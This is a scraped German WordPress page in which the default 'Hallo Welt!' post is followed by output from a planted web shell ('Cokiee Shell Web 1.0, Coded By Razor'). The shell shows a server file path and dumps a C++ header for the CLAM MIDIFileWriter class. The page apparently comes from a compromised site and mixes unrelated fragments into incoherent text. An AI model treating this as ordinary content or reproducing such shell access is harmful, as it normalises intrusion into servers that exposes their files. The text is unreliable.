Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/include/CLAM/ |
Current File : //proc/self/root/usr/include/CLAM/MIDIFileWriter.hxx |
#ifndef __MIDIFILEWRITER__ #define __MIDIFILEWRITER__ #include <list> #include "InPort.hxx" #include "MIDIMelody.hxx" #include "MIDITypes.hxx" #include "MIDIFileIOConfig.hxx" #include "Processing.hxx" namespace CLAM { class MIDIFileWriter : public Processing { public: MIDIFileWriter(); MIDIFileWriter(const MIDIFileIOConfig& cfg); ~MIDIFileWriter(); bool Do(); bool Do(const MIDISong& in); const char * GetClassName() const {return "MIDIFileWriter";} inline const ProcessingConfig &GetConfig() const { return mConfig;} bool ConcreteConfigure(const ProcessingConfig& c); private: MIDIFileIOConfig mConfig; InPort<MIDISong> mInput; std::list<MIDIEvent> mEventList; void BuildEventList(const MIDITrack& trk); }; } #endif
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare